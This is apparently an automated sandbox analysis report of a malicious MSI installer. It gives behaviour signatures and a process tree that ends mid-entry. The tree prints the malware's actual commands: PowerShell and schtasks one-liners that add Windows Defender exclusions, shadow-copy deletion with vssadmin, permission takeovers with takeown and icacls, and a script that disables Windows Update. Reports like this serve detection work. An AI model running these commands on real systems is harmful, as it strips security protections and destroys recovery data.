Analysis

  • max time kernel
    139s
  • max time network
    154s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    04/08/2026, 07:11

General

  • Target
    setup_n0c016.msi
  • Size 9.2MB
  • Sample260804-h1bvsstemg
  • SHA256 6427b9d4f3e73d7d9f121d0c56be6abc7b068830762a1441fe25a47c603a2127
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Possible privilege escalation attempt 23 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 2 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Executes a command shell one-liner 1 TTPs 28 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 22 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup_n0c016.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:4936
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4868
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3680
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 8A9EEEA0C399204B818E434DD89E866B E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:3288
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:3360
  • C:\Users\Public\xw5wUp\aZMwMQ.exe
    "C:\Users\Public\xw5wUp\aZMwMQ.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:1476
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\xw5wUp\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:1140
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\xw5wUp\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:5888
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:4604
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:4916
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4072
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4748
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:4300
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:1468
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:2044
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2892
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:5376
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:2532
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:4480
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3368
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:3416
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:4992
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:3108
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:1896
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:1504
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:1572
                        • C:\Program Files (x86)\gu8Jvs\gu8Jvs.exe
                          "C:\Program Files (x86)\gu8Jvs\gu8Jvs.exe"
                          2⤵
                          • UAC bypass
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:1408
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:6088
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            PID:4492
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\gu8Jvs" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:4924
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:3452
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:896
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            PID:3444
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\gu8Jvs" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:1664
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\gu8Jvs\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            PID:2524
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\gu8Jvs\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:52
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                                PID:2516
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                  PID:4640
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                                3⤵
                                • Executes a command shell one-liner
                                PID:4336
                                • C:\Windows\SysWOW64\net.exe
                                  net stop wuauserv
                                  4⤵
                                    PID:3016
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop wuauserv
                                      5⤵
                                        PID:3092
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config wuauserv start= disabled
                                      4⤵
                                      • Launches sc.exe
                                      PID:5272
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc failure wuauserv reset= 0 actions= ""
                                      4⤵
                                      • Launches sc.exe
                                      PID:2956
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop UsoSvc
                                      4⤵
                                        PID:5356
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop UsoSvc
                                          5⤵
                                            PID:3388
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc config UsoSvc start= disabled
                                          4⤵
                                          • Launches sc.exe
                                          PID:4180
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc failure UsoSvc reset= 0 actions= ""
                                          4⤵
                                          • Launches sc.exe
                                          PID:4804
                                        • C:\Windows\SysWOW64\net.exe
                                          net stop uhssvc
                                          4⤵
                                            PID:5552
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 stop uhssvc
                                              5⤵
                                                PID:5956
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc config uhssvc start= disabled
                                              4⤵
                                              • Launches sc.exe
                                              PID:4756
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc failure uhssvc reset= 0 actions= ""
                                              4⤵
                                              • Launches sc.exe
                                              PID:5840
                                            • C:\Windows\SysWOW64\net.exe
                                              net stop WaaSMedicSvc
                                              4⤵
                                                PID:2176
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 stop WaaSMedicSvc
                                                  5⤵
                                                    PID:5324
                                                • C:\Windows\SysWOW64\sc.exe
                                                  sc config WaaSMedicSvc start= disabled
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:788
                                                • C:\Windows\SysWOW64\sc.exe
                                                  sc failure WaaSMedicSvc reset= 0 actions= ""
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:1252
                                                • C:\Windows\SysWOW64\takeown.exe
                                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:2380
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:4504
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:5948
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:5884
                                                • C:\Windows\SysWOW64\takeown.exe
                                                  takeown /f C:\Windows\System32\wuaueng.dll
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:3288
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:2700
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:1084
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:4152
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                                  4⤵
                                                    PID:1568
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                                    4⤵
                                                      PID:4796
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                                      4⤵
                                                        PID:2756
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        PID:4160
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:4876
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\gu8Jvs" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:5780
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs\gu8Jvs.exe" /inheritance:r
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:4636
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\gu8Jvs\gu8Jvs.exe" /inheritance:r
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:936
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs\gu8Jvs.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:4788
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\gu8Jvs\gu8Jvs.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:5404
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs\gu8Jvs.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:5676
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\gu8Jvs\gu8Jvs.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:5816
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs\image.png" /inheritance:r
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:2168
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\gu8Jvs\image.png" /inheritance:r
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:4400
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:2860
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\gu8Jvs\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:1608
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:4516
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\gu8Jvs\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:4800
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs\thumbs.db" /inheritance:r
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:4352
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\gu8Jvs\thumbs.db" /inheritance:r
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:3500
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:4996
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\gu8Jvs\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:1888
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:4128
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\gu8Jvs\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:912
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs\XPSPLOG.dll" /inheritance:r
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:5316
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\gu8Jvs\XPSPLOG.dll" /inheritance:r
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:5268
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\gu8Jvs\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:5496
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\gu8Jvs\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:2588
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                      3⤵
                                                      • Indicator Removal: Clear Persistence
                                                      PID:5148
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                        4⤵
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:4628
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        SCHTASKS /Run /TN "Task1"
                                                        4⤵
                                                          PID:6028
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          SCHTASKS /Delete /TN "Task1" /F
                                                          4⤵
                                                            PID:3656
                                                        • C:\Windows\SysWOW64\cmd.exe
